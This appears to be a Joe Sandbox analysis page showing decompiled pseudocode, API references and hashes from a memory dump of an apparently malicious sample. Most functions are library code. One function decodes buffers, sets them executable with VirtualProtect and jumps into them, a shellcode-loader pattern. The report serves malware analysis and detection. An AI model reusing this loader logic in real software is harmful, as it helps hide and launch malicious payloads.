													__eflags = _t426 -  *((intOrPtr*)(_t380 + 2));
													_v454 = _t426;
													_t425 = _v452;
													if(_t426 !=  *((intOrPtr*)(_t380 + 2))) {
														break;
													} else {
														_t266 = _t266 + 4;
														_t380 = _t380 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t267;
												if(_t267 == 0) {
													_t365 = _t365 + 1;
													__eflags = _t365;
													goto L74;
												} else {
													_t268 =  &_v276;
													_push(_t268);
													_push(_t447);
													_push(_t429);
													L83();
													_t425 = _v452;
													_t468 = _t468 + 0xc;
													__eflags = _t268;
													if(_t268 == 0) {
														_t379 = 0;
														_t265 = 0;
														_v460 = 0;
													} else {
														_t365 = _t365 + 1;
														_t379 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t267 = _t266 | 0x00000001;
											_t379 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t447 = _t447 + 1;
										_t425 = _t425 + 0x10;
										_v452 = _t425;
										__eflags = _t447 - 5;
									} while (_t447 <= 5);
									__eflags = _t265;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t365;
										if(__eflags != 0) {
											goto L79;
										} else {
											_t259 = _t379;
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t445 + 2) - 0x43;
								if( *(_t445 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
									if( *((short*)(_t445 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t269 = E0138E8A0(_t445, 0x13972cc);
											_t367 = _t269;
											_v468 = _t367;
											_pop(_t382);
											__eflags = _t367;
											if(_t367 == 0) {
												break;
											}
											_t270 = _t269 - _t445;
											__eflags = _t270;
											_v460 = _t270 >> 1;
											if(_t270 == 0) {
												break;
											} else {
												_t272 = 0x3b;
												__eflags =  *_t367 - _t272;
												if( *_t367 == _t272) {
													break;
												} else {
													_t432 = _v460;
													_t368 = 0x1397214;
													_v456 = 1;
													do {
														_t273 = E01385868( *_t368, _t445, _t432);
														_t467 = _t467 + 0xc;
														__eflags = _t273;
														if(_t273 != 0) {
															goto L45;
														} else {
															_t383 =  *_t368;
															_t424 = _t383 + 2;
															do {
																_t339 =  *_t383;
																_t383 = _t383 + 2;
																__eflags = _t339 - _v472;
															} while (_t339 != _v472);
															_t382 = _t383 - _t424 >> 1;
															__eflags = _t432 - _t383 - _t424 >> 1;
															if(_t432 != _t383 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t368 = _t368 + 0xc;
														__eflags = _t368 - 0x1397244;
													} while (_t368 <= 0x1397244);
													_t365 = _v468 + 2;
													_t274 = E0138E847(_t382, _t365, 0x13972d4);
													_t429 = _v464;
													_t448 = _t274;
													_pop(_t386);
													__eflags = _t448;
													if(_t448 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t387 = _v452;
															goto L54;
														} else {
															_push(_t448);
															_t277 = E0138C52A( &_v276, 0x83, _t365);
															_t469 = _t467 + 0x10;
															__eflags = _t277;
															if(_t277 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E0138016C();
																asm("int3");
																_push(_t461);
																_t462 = _t469;
																_t280 =  *0x13a3014; // 0x98b2b77b
																_v560 = _t280 ^ _t462;
																_push(_t365);
																_t370 = _v544;
																_push(_t448);
																_push(_t429);
																_t433 = _v548;
																_v1288 = _t370;
																_v1284 = E01385D71(_t386, _t424) + 0x278;
																_t287 = E01383A48(_t370, _t424, _t433, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t471 = _t469 - 0x2e4 + 0x18;
																__eflags = _t287;
																if(_t287 == 0) {
																	L122:
																	_t288 = 0;
																	__eflags = 0;
																	goto L123;
																} else {
																	_t103 = _t370 + 2; // 0x6
																	_t452 = _t103 << 4;
																	__eflags = _t452;
																	_t290 =  &_v280;
																	_v720 = _t452;
																	_t424 =  *(_t452 + _t433);
																	_t390 = _t424;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t290 -  *_t390;
																		_t454 = _v720;
																		if( *_t290 !=  *_t390) {
																			break;
																		}
																		__eflags =  *_t290;
																		if( *_t290 == 0) {
																			L89:
																			_t291 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t290 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t390 + 2));
																			_v714 = _t459;
																			_t454 = _v720;
																			if(_t459 !=  *((intOrPtr*)(_t390 + 2))) {
																				break;
																			} else {
																				_t290 = _t290 + 4;
																				_t390 = _t390 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t291;
																		if(_t291 != 0) {
																			_t391 =  &_v280;
																			_t424 = _t391 + 2;
																			do {
																				_t292 =  *_t391;
																				_t391 = _t391 + 2;
																				__eflags = _t292 - _v712;
																			} while (_t292 != _v712);
																			_v716 = (_t391 - _t424 >> 1) + 1;
																			_t295 = E0138871A(4 + ((_t391 - _t424 >> 1) + 1) * 2);
																			_v732 = _t295;
																			__eflags = _t295;
																			if(_t295 == 0) {
																				goto L122;
																			} else {
																				_v728 =  *((intOrPtr*)(_t454 + _t433));
																				_v748 =  *(_t433 + 0xa0 + _t370 * 4);
																				_v752 =  *(_t433 + 8);
																				_t398 =  &_v280;
																				_v736 = _t295 + 4;
																				_t297 = E0138B4FE(_t295 + 4, _v716, _t398);
																				_t472 = _t471 + 0xc;
																				__eflags = _t297;
																				if(_t297 != 0) {
																					_t298 = _v712;
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					E0138016C();
																					asm("int3");
																					_push(_t462);
																					_push(_t398);
																					_v1336 = _v1336 & 0x00000000;
																					_t301 = E013884AC(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t301;
																					if(_t301 == 0) {
																						L132:
																						return 0xfde9;
																					}
																					_t303 = _v20;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L132;
																					}
																					return _t303;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t454 + _t433)) = _v736;
																					if(_v280 != 0x43) {
																						L100:
																						_t306 = E01383765(_t370, _t433,  &_v708);
																						_t424 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t424 = _v712;
																							_t306 = _t424;
																						}
																					}
																					 *(_t433 + 0xa0 + _t370 * 4) = _t306;
																					__eflags = _t370 - 2;
																					if(_t370 != 2) {
																						__eflags = _t370 - 1;
																						if(_t370 != 1) {
																							__eflags = _t370 - 5;
																							if(_t370 == 5) {
																								 *((intOrPtr*)(_t433 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t433 + 0x10)) = _v724;
																						}
																					} else {
																						_t458 = _v740;
																						 *(_t433 + 8) = _v724;
																						_v716 = _t458[8];
																						_t410 = _t458[9];
																						_v724 = _t410;
																						while(1) {
																							__eflags =  *(_t433 + 8) -  *(_t458 + _t424 * 8);
																							if( *(_t433 + 8) ==  *(_t458 + _t424 * 8)) {
																								break;
																							}
																							_t334 =  *(_t458 + _t424 * 8);
																							_t410 =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _v724;
																							_t424 = _t424 + 1;
																							_t370 = _v744;
																							_v716 = _t334;
																							_v724 = _t410;
																							__eflags = _t424 - 5;
																							if(_t424 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t424 - 5;
																							if(__eflags == 0) {
																								_t326 = E0138B3FB(__eflags, _v712, 1, 0x1397188, 0x7f,  &_v536,  *(_t433 + 8), 1);
																								_t472 = _t472 + 0x1c;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									_t411 = _v712;
																								} else {
																									_t328 = _v712;
																									do {
																										 *(_t462 + _t328 * 2 - 0x20c) =  *(_t462 + _t328 * 2 - 0x20c) & 0x000001ff;
																										_t328 = _t328 + 1;
																										__eflags = _t328 - 0x7f;
																									} while (_t328 < 0x7f);
																									_t330 = E01379981( &_v536,  *0x13a3194, 0xfe);
																									_t472 = _t472 + 0xc;
																									__eflags = _t330;
																									_t411 = 0 | _t330 == 0x00000000;
																								}
																								_t458[1] = _t411;
																								 *_t458 =  *(_t433 + 8);
																							}
																							 *(_t433 + 0x18) = _t458[1];
																							goto L120;
																						}
																						__eflags = _t424;
																						if(_t424 != 0) {
																							 *_t458 =  *(_t458 + _t424 * 8);
																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _t410;
																						}
																						goto L108;
																					}
																					L120:
																					_t307 = _t370 * 0xc;
																					_t204 = _t307 + 0x1397210; // 0x13770d1
																					 *0x1394134(_t433);
																					_t309 =  *((intOrPtr*)( *_t204))();
																					_t402 = _v728;
																					__eflags = _t309;
																					if(_t309 == 0) {
																						__eflags = _t402 - 0x13a3268;
																						if(_t402 == 0x13a3268) {
																							L127:
																							_t310 = _v720;
																						} else {
																							_t457 = _t370 + _t370;
																							__eflags = _t457;
																							asm("lock xadd [eax], ecx");
																							if(_t457 != 0) {
																								goto L127;
																							} else {
																								E013871B2( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
																								E013871B2( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
																								E013871B2( *(_t433 + 0xa0 + _t370 * 4));
																								_t310 = _v720;
																								_t405 = _v712;
																								 *(_t310 + _t433) = _t405;
																								 *(_t433 + 0xa0 + _t370 * 4) = _t405;
																							}
																						}
																						_t403 = _v732;
																						 *_t403 = 1;
																						_t288 =  *(_t310 + _t433);
																						 *((intOrPtr*)(_t433 + 0x28 + (_t370 + _t370) * 8)) = _t403;
																					} else {
																						 *((intOrPtr*)(_v720 + _t433)) = _t402;
																						E013871B2( *(_t433 + 0xa0 + _t370 * 4));
																						 *(_t433 + 0xa0 + _t370 * 4) = _v748;
																						E013871B2(_v732);
																						 *(_t433 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			_t288 = _t424;
																			L123:
																			_pop(_t434);
																			_pop(_t450);
																			__eflags = _v16 ^ _t462;
																			_pop(_t371);
																			return E01377F14(_t288, _t371, _v16 ^ _t462, _t424, _t434, _t450);
																		}
																		goto L134;
																	}
																	asm("sbb eax, eax");
																	_t291 = _t290 | 0x00000001;
																	__eflags = _t291;
																	goto L91;
																}
															} else {
																_t335 = _t448 + _t448;
																__eflags = _t335 - 0x106;
																if(_t335 >= 0x106) {
																	E01378857();
																	goto L82;
																} else {
																	 *((short*)(_t461 + _t335 - 0x10c)) = 0;
																	_t337 =  &_v276;
																	_push(_t337);
																	_push(_v456);
																	_push(_t429);
																	L83();
																	_t387 = _v452;
																	_t467 = _t469 + 0xc;
																	__eflags = _t337;
																	if(_t337 != 0) {
																		_t387 = _t387 + 1;
																		_v452 = _t387;
																	}
																	L54:
																	_t445 = _t365 + _t448 * 2;
																	_t275 =  *_t445 & 0x0000ffff;
																	_t424 = _t275;
																	__eflags = _t275;
																	if(_t275 != 0) {
																		_t445 = _t445 + 2;
																		__eflags = _t445;
																		_t424 =  *_t445 & 0x0000ffff;
																	}
																	__eflags = _t424;
																	if(_t424 != 0) {
																		continue;
																	} else {
																		__eflags = _t387;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t338 = 0x3b;
														__eflags =  *_t365 - _t338;
														if( *_t365 != _t338) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L134;
										}
										_t259 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t445;
						if(_t445 == 0) {
							_t259 =  *(_t429 + (_t259 + 2 + _t259 + 2) * 8);
						} else {
							_push(_t445);
							_push(_t259);
							_push(_t429);
							L83();
						}
						L80:
						_pop(_t430);
						_pop(_t446);
						__eflags = _v12 ^ _t461;
						_pop(_t366);
						return E01377F14(_t259, _t366, _v12 ^ _t461, _t424, _t430, _t446);
					}
				}
				L134:
			}

0x01383ed2
0x01383eda
0x01383edb
0x01383ee4
0x01383ee7
0x01383eec
0x01383eee
0x01383ef0
0x01383ef3
0x01384010
0x01384013
0x01383ef9
0x01383ef9
0x01383efa
0x01383efc
0x01383efc
0x01383eff
0x01383f02
0x01383f05
0x01383f08
0x01383f0a
0x01383f0d
0x01383f12
0x01383f20
0x01383f2a
0x01383f2d
0x01383f30
0x01383f30
0x01383f3b
0x01383f40
0x01383f45
0x00000000
0x01383f4b
0x01383f4e
0x01383f4e
0x01383f51
0x01383f53
0x01383f56
0x01383f58
0x01383f58
0x01383f58
0x01383f5b
0x01383f5b
0x01383f5b
0x01383f61
0x00000000
0x00000000
0x01383f66
0x01383f7d
0x01383f7d
0x01383f68
0x01383f68
0x01383f70
0x00000000
0x01383f72
0x01383f72
0x01383f75
0x01383f7b
0x00000000
0x00000000
0x00000000
0x00000000
0x01383f7b
0x01383f70
0x01383f86
0x01383f86
0x01383f8b
0x01383f90
0x01383f94
0x01383fa0
0x01383fa3
0x01383fa6
0x01383fb0
0x01383fb8
0x01383fc0
0x00000000
0x01383fc6
0x01383fca
0x01384015
0x0138401e
0x01384021
0x01384023
0x01384027
0x0138402b
0x01384030
0x01384035
0x0138402b
0x01384039
0x0138403b
0x0138403d
0x01384041
0x01384042
0x01384047
0x0138404c
0x01384042
0x0138404f
0x01384052
0x01384055
0x01384058
0x0138405b
0x01383fcc
0x01383fcf
0x01383fd2
0x01383fd4
0x01383fd8
0x01383fdc
0x01383fe1
0x01383fe6
0x01383fdc
0x01383fec
0x01383fee
0x01383ff3
0x01383ff8
0x01383ffd
0x01383ff3
0x01383ffe
0x01384002
0x01384002
0x01384005
0x01384009
0x0138400c
0x0138400c
0x00000000
0x0138400f
0x00000000
0x01383fc0
0x01383f81
0x01383f83
0x01383f83
0x00000000
0x01383f83
0x01384062
0x01384063
0x01384064
0x01384065
0x01384066
0x01384067
0x0138406c
0x01384070
0x01384072
0x01384078
0x0138407f
0x01384082
0x01384085
0x01384086
0x01384087
0x0138408a
0x0138408b
0x0138408e
0x01384094
0x01384096
0x013840bb
0x013840c5
0x013840cb
0x013840cd
0x013840d3
0x013840d5
0x01384335
0x01384336
0x00000000
0x013840db
0x013840db
0x013840df
0x0138424d
0x0138426a
0x0138426f
0x01384272
0x01384274
0x0138427a
0x0138427a
0x0138427c
0x0138427f
0x01384281
0x01384287
0x01384287
0x01384289
0x01384310
0x01384310
0x0138428f
0x0138428f
0x01384291
0x01384297
0x0138429a
0x0138429d
0x013842a3
0x00000000
0x00000000
0x013842a5
0x013842a9
0x013842d2
0x013842d2
0x013842d4
0x013842ab
0x013842ab
0x013842af
0x013842b3
0x013842ba
0x013842c0
0x00000000
0x013842c2
0x013842c2
0x013842c5
0x013842c8
0x013842d0
0x00000000
0x00000000
0x00000000
0x00000000
0x013842d0
0x013842c0
0x013842df
0x013842df
0x013842e1
0x0138430f
0x0138430f
0x00000000
0x013842e3
0x013842e3
0x013842e9
0x013842ea
0x013842eb
0x013842ec
0x013842f1
0x013842f7
0x013842fa
0x013842fc
0x01384303
0x01384305
0x01384307
0x013842fe
0x013842fe
0x013842ff
0x00000000
0x013842ff
0x013842fc
0x00000000
0x013842e1
0x013842d8
0x013842da
0x013842dd
0x013842dd
0x00000000
0x013842dd
0x01384316
0x01384316
0x01384317
0x0138431a
0x01384320
0x01384320
0x01384329
0x0138432b
0x00000000
0x0138432d
0x0138432d
0x0138432f
0x00000000
0x01384331
0x01384331
0x01384331
0x0138432f
0x0138432b
0x00000000
0x013840e5
0x013840e5
0x013840ea
0x00000000
0x013840f0
0x013840f0
0x013840f5
0x00000000
0x013840fb
0x013840fb
0x01384101
0x01384106
0x01384108
0x0138410f
0x01384110
0x01384112
0x00000000
0x00000000
0x01384118
0x01384118
0x0138411c
0x01384122
0x00000000
0x01384128
0x0138412a
0x0138412b
0x0138412e
0x00000000
0x01384134
0x01384134
0x0138413a
0x0138413f
0x01384149
0x0138414d
0x01384152
0x01384155
0x01384157
0x00000000
0x01384159
0x01384159
0x0138415b
0x0138415e
0x0138415e
0x01384161
0x01384164
0x01384164
0x0138416f
0x01384171
0x01384173
0x00000000
0x00000000
0x01384173
0x00000000
0x01384175
0x01384175
0x0138417b
0x0138417e
0x0138417e
0x0138418c
0x01384195
0x0138419a
0x013841a0
0x013841a3
0x013841a4
0x013841a6
0x013841b4
0x013841b4
0x013841bb
0x0138421c
0x00000000
0x013841bd
0x013841bd
0x013841cb
0x013841d0
0x013841d3
0x013841d5
0x01384350
0x01384352
0x01384353
0x01384354
0x01384355
0x01384356
0x01384357
0x0138435c
0x0138435f
0x01384360
0x01384368
0x0138436f
0x01384372
0x01384373
0x01384376
0x0138437a
0x0138437b
0x0138437e
0x0138438e
0x013843b1
0x013843b6
0x013843b9
0x013843bb
0x01384671
0x01384671
0x01384671
0x00000000
0x013843c1
0x013843c1
0x013843c4
0x013843c4
0x013843c7
0x013843cd
0x013843d3
0x013843d6
0x013843d8
0x013843db
0x013843e2
0x013843e5
0x013843eb
0x00000000
0x00000000
0x013843ed
0x013843f1
0x0138441a
0x0138441a
0x013843f3
0x013843f3
0x013843f7
0x013843fb
0x01384402
0x01384408
0x00000000
0x0138440a
0x0138440a
0x0138440d
0x01384410
0x01384418
0x00000000
0x00000000
0x00000000
0x00000000
0x01384418
0x01384408
0x01384427
0x01384427
0x01384429
0x01384432
0x01384438
0x0138443b
0x0138443b
0x0138443e
0x01384441
0x01384441
0x01384451
0x0138445f
0x01384464
0x0138446b
0x0138446d
0x00000000
0x01384473
0x01384479
0x01384486
0x0138448f
0x01384495
0x013844a2
0x013844a9
0x013844ae
0x013844b1
0x013844b3
0x013846f1
0x013846f7
0x013846f8
0x013846f9
0x013846fa
0x013846fb
0x013846fc
0x01384701
0x01384704
0x01384707
0x01384708
0x0138471a
0x0138471f
0x01384721
0x0138472a
0x00000000
0x0138472a
0x01384723
0x01384726
0x01384728
0x00000000
0x00000000
0x01384730
0x013844b9
0x013844b9
0x013844c7
0x013844ca
0x013844e0
0x013844e7
0x013844ec
0x013844cc
0x013844cc
0x013844d4
0x00000000
0x013844d6
0x013844d6
0x013844dc
0x013844dc
0x013844d4
0x013844f3
0x013844fa
0x013844fd
0x013845fb
0x013845fe
0x0138460b
0x0138460e
0x01384616
0x01384616
0x01384600
0x01384606
0x01384606
0x01384503
0x01384503
0x0138450f
0x01384515
0x0138451b
0x0138451e
0x01384524
0x01384527
0x0138452a
0x00000000
0x00000000
0x0138452c
0x01384535
0x01384539
0x01384542
0x01384546
0x01384547
0x0138454d
0x01384553
0x01384559
0x0138455c
0x00000000
0x00000000
0x0138455e
0x0138457d
0x0138457d
0x01384580
0x0138459d
0x013845a2
0x013845a5
0x013845a7
0x013845e5
0x013845a9
0x013845a9
0x013845af
0x013845b4
0x013845bc
0x013845bd
0x013845bd
0x013845d4
0x013845db
0x013845de
0x013845e0
0x013845e0
0x013845eb
0x013845f1
0x013845f1
0x013845f6
0x00000000
0x013845f6
0x01384560
0x01384562
0x01384567
0x0138456d
0x01384576
0x01384579
0x01384579
0x00000000
0x01384562
0x01384619
0x01384619
0x0138461d
0x01384625
0x0138462b
0x0138462e
0x01384634
0x01384636
0x01384682
0x01384688
0x013846d4
0x013846d4
0x0138468a
0x0138468f
0x0138468f
0x01384695
0x01384699
0x00000000
0x0138469b
0x0138469f
0x013846a8
0x013846b4
0x013846b9
0x013846c2
0x013846c8
0x013846cb
0x013846cb
0x01384699
0x013846da
0x013846e2
0x013846e8
0x013846eb
0x01384638
0x0138463e
0x01384648
0x0138465a
0x01384661
0x0138466e
0x00000000
0x0138466e
0x00000000
0x01384636
0x013844b3
0x0138442b
0x0138442b
0x01384673
0x01384676
0x01384677
0x01384678
0x0138467a
0x01384681
0x01384681
0x00000000
0x01384429
0x01384422
0x01384424
0x01384424
0x00000000
0x01384424
0x013841db
0x013841db
0x013841de
0x013841e3
0x0138434b
0x00000000
0x013841e9
0x013841eb
0x013841f3
0x013841f9
0x013841fa
0x01384200
0x01384201
0x01384206
0x0138420c
0x0138420f
0x01384211
0x01384213
0x01384214
0x01384214
0x01384222
0x01384222
0x01384225
0x01384228
0x0138422a
0x0138422d
0x0138422f
0x0138422f
0x01384232
0x01384232
0x01384235
0x01384238
0x00000000
0x0138423e
0x0138423e
0x01384240
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01384240
0x01384238
0x013841e3
0x013841d5
0x013841a8
0x013841aa
0x013841ab
0x013841ae
0x00000000
0x00000000
0x00000000
0x00000000
0x013841ae
0x013841a6
0x0138412e
0x00000000
0x01384122
0x01384246
0x00000000
0x01384246
0x013840f5
0x013840ea
0x013840df
0x01384098
0x01384098
0x0138409a
0x013840b1
0x0138409c
0x0138409c
0x0138409d
0x0138409e
0x0138409f
0x013840a4
0x0138433c
0x0138433f
0x01384340
0x01384341
0x01384343
0x0138434a
0x0138434a
0x01384096
0x00000000

APIs

Part of subcall function 0138871A: RtlAllocateHeap.NTDLL(00000000,?,?,?,01378B75,?,?,?,?,?,01371221,?,?), ref: 0138874C

_free.LIBCMT ref: 01383FE1
_free.LIBCMT ref: 01383FF8
_free.LIBCMT ref: 01384015
_free.LIBCMT ref: 01384030
_free.LIBCMT ref: 01384047

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: d6482be999a97fd25ab35851cc9abeb4b7060fbbe228474cfc0a3dbcb293fa31
Instruction ID: 1b83b01b4e6cceac894fcffee6d9a38526e8815793ef84001330ceacf5ae067c
Opcode Fuzzy Hash: d6482be999a97fd25ab35851cc9abeb4b7060fbbe228474cfc0a3dbcb293fa31
Instruction Fuzzy Hash: 3151E072A00306AFDB21EF2DC841B6AB7F5FF54728F1405A9E849DB690E731E9458B90

Uniqueness

Uniqueness Score: -1.00%

Function 01371F6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E01371F6D(void* __eflags, void* __fp0) {
				signed int _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t20;
				intOrPtr* _t26;
				intOrPtr _t28;
				void* _t29;
				intOrPtr* _t43;
				void* _t45;
				intOrPtr _t49;
				void* _t58;
				void* _t66;
				long _t67;
				void* _t70;
				void* _t71;
				intOrPtr* _t72;
				void* _t75;
				signed int _t77;
				signed int _t79;
				void* _t82;
				void* _t92;

				_t92 = __fp0;
				_t82 = __eflags;
				_t77 = _t79;
				_t20 =  *0x13a3014; // 0x98b2b77b
				_v8 = _t20 ^ _t77;
				_push(_t71);
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x10], xmm0");
				 *0x14a613c = GetModuleHandleA("kernel32.dll");
				_t43 = E01377F22(_t71, _t82, 0x14);
				_t67 = 0;
				 *_t43 = 0;
				_t3 = _t43 + 8; // 0x8
				_t72 = _t3;
				 *((intOrPtr*)(_t43 + 4)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				 *((intOrPtr*)(_t43 + 0x10)) = 0;
				 *_t72 = 0;
				 *((intOrPtr*)(_t72 + 4)) = 0;
				 *((intOrPtr*)(_t72 + 8)) = 0;
				_v12 = 0x84;
				E01374F83(_t43, _t72, 0, _t72, 0, 0,  &_v12, _t66);
				do {
					 *_t43 = _t67;
					_t26 =  *((intOrPtr*)(_t72 + 4));
					if(_t26 ==  *((intOrPtr*)(_t72 + 8))) {
						_push(_t43);
						_push(_t26);
						E01374F83(_t43, _t72, _t67, _t72, __eflags);
					} else {
						 *_t26 = _t67;
						 *((intOrPtr*)(_t72 + 4)) =  *((intOrPtr*)(_t72 + 4)) + 4;
					}
					_t67 = _t67 + 1;
				} while (_t67 < 0x64);
				_t49 = _v16;
				_t28 = _v20;
				do {
					_t28 = _t28 + 1;
					asm("adc ecx, ebx");
				} while (_t28 == 0 && _t28 <= 0x5f5e100);
				_t29 = _t28 + 1;
				asm("adc ecx, ebx");
				_v16 = _t49;
				if(_t29 != 0 || _t29 >= 0x5f5e0ff) {
					_push(_t49);
					E01371DA9(0x14a4680, 0x77e, _t92);
					E01371DA9(0x13a3a80, 0x100c00, _t92);
					_v12 = 0;
					E01371E14();
					VirtualProtect(0x14a4680, 0x77e, 0x40,  &_v12); // executed
					_push(0x13a3a80);
					_push(0);
					_push( *0x14a4e00);
					asm("loop 0xffffffff");
					_push(0);
					_push(0x14a4680);
					return 0x14a46a2;
				} else {
					_pop(_t70);
					_pop(_t75);
					__eflags = _v8 ^ _t77;
					_pop(_t45);
					return E01377F14(0, _t45, _v8 ^ _t77, _t58, _t70, _t75);
				}
			}

0x01371f6d
0x01371f6d
0x01371f6e
0x01371f73
0x01371f7a
0x01371f7e
0x01371f80
0x01371f88
0x01371f95
0x01371f9f
0x01371fa1
0x01371fa8
0x01371faa
0x01371faa
0x01371fad
0x01371fb2
0x01371fb5
0x01371fb9
0x01371fbb
0x01371fbe
0x01371fc1
0x01371fc8
0x01371fcd
0x01371fcd
0x01371fcf
0x01371fd5
0x01371fdf
0x01371fe0
0x01371fe3
0x01371fd7
0x01371fd7
0x01371fd9
0x01371fd9
0x01371fe8
0x01371fe9
0x01371fee
0x01371ff3
0x01371ff6
0x01371ff6
0x01371ff9
0x01371ff9
0x01372004
0x01372007
0x01372009
0x0137200c
0x01372015
0x01372024
0x01372033
0x01372039
0x0137203c
0x0137204f
0x01372058
0x0137205d
0x01372069
0x0137207c
0x01372080
0x01372082
0x01372083
0x01372093
0x01372098
0x01372099
0x0137209a
0x0137209c
0x013720a3
0x013720a3

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 01371F8D

Part of subcall function 01374F83: __EH_prolog3_catch.LIBCMT ref: 01374F8A

VirtualProtect.KERNELBASE(014A4680,0000077E,00000040,00000084,?,00000000,00000000,?), ref: 0137204F

Strings

kernel32.dll, xrefs: 01371F83

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: H_prolog3_catchHandleModuleProtectVirtual
String ID: kernel32.dll
API String ID: 2053513580-1793498882
Opcode ID: 01ac3c3374519eff8038a8534755ec56cceef32b182e7d131739e2994bec3cc7
Instruction ID: be774682e6905df2635afdbb5ab37325462b6076ead086e6c81f900edde72047
Opcode Fuzzy Hash: 01ac3c3374519eff8038a8534755ec56cceef32b182e7d131739e2994bec3cc7
Instruction Fuzzy Hash: D031B2B2A002049BDB24DF5ED881A6FBBEAFFE4314F15846EE106DB254DB7499058B50

Uniqueness

Uniqueness Score: -1.00%

Function 01387D4A Relevance: 4.7, APIs: 3, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E01387D4A(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				void* _t53;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x13a3014; // 0x98b2b77b
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E013826ED(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
